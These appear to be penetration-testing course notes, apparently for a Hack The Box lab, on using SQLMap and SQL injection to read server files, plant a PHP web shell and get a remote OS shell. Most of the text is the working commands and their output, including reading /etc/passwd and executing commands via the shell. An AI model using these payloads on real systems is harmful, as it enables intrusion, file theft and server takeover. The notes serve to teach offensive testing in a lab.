OS EXPLOITATION

SQLMap has the ability to utilize SQLi to read and write files from the local system outside the DBMS. it can also attempt direct command execution on the remote host with proper privileges.

to read local files, the DB user must have the privilege to LOAD DATA and INSERT IOT load the content of a file to a table and then reading that table.

An example of such a command is LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE passwd;

Requirements:

  • DBA: True

  • File Read/Write

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
BURP > Proxy > Intercept > Raw > right-click > copy to file > burpRequest.txt
 * this method is used when intercepting potential parameters with Burp Suite along
   with exporting the complex HTTP request with lots of different header values Burp has captured

 * inspect the request and obtain any pertinent info
    - GET /?id=1 HTTP/1.1

root@oco:~$ sqlmap -r req.txt --banner --current-user --current-db --is-dba --dump --batch --level=5 --risk=3 --no-cast --thread=10 --random-agent
 * current user is DBA: True
 
#Reading Local Files
root@oco:~$ sqlmap -r req.txt --file-read "/etc/passwd"
 * sqlmap doesn't have a --secure-file-priv cmd which test whether a file location can be read/written
    - the --secure-file-priv is a mysql specific cmd
 * the --file-read option is used to read files from the local system
    - file save location ~/.sqlmap/output/{targetSite}/files/_etc_passwd
root@oco:~$ cat cat ~/share/sqlmap/output/{targetSite}/files/_etc_passwd
    
#Writing Files to the Host Server
#modern DBMSes disable file-write by default and need certain privileges for DBA's to be able to write files
#the --secure-file-priv configuration must be manually disabled to allow writing data into local files using the INTO OUTFILE SQL query
root@oco:~$ echo '<?php system($_GET["cmd"]); ?>' > shell.php
root@oco:~$ sqlmap -r req.txt --file-write "shell.php" --file-dest "/var/www/html/shell.php"

#ALT METHOD: RCE verification
root@oco:~$ curl http://{targetSite:port}/shell.php?cmd=ls+-la
 * the + in ls+-la represents space
root@oco:~$ curl http://{targetSite:port}/shell.php?cmd=cat+flag.txt
 * HTB{5up3r_u53r5_4r3_p0w3rful!}

#once File writing is confirmed, use the cmd below to test SQLMap's remote shell ability
#instead of manually writing a remote shell
root@oco:~$ sqlmap -r req.txt --os-shell --batch
 * this default method uses UNION-based technique
os-shell> ls -la
 do you want to retrieve the command standard output? [Y/n/a] a
 * if the above fails use the alternate technique
 
root@oco:~$ sqlmap -r req.txt --os-shell --technique=E --batch
 * this alternate method uses Error-based SQL Injection technique
    - --technique=E means Error-based SQLi
 which web application language does the web server support?
 [1] ASP
 [2] ASPX
 [3] JSP
 [4] PHP (default)
 > 4
 
 do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
 
 what do you want to use for writable directory?
 [1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs') (default)
 [2] custom location(s)
 [3] custom directory list file
 [4] brute force search
 > 1
 
os-shell> ls -la
 do you want to retrieve the command standard output? [Y/n/a] a
 command standard output:
 ---
 total 156
 drwxrwxrwt 1 www-data www-data   4096 Nov 19 18:06 .
 drwxr-xr-x 1 www-data www-data   4096 Nov 19 08:15 ..
 -rw-rw-rw- 1 mysql    mysql       188 Nov 19 07:39 basic.php

Last updated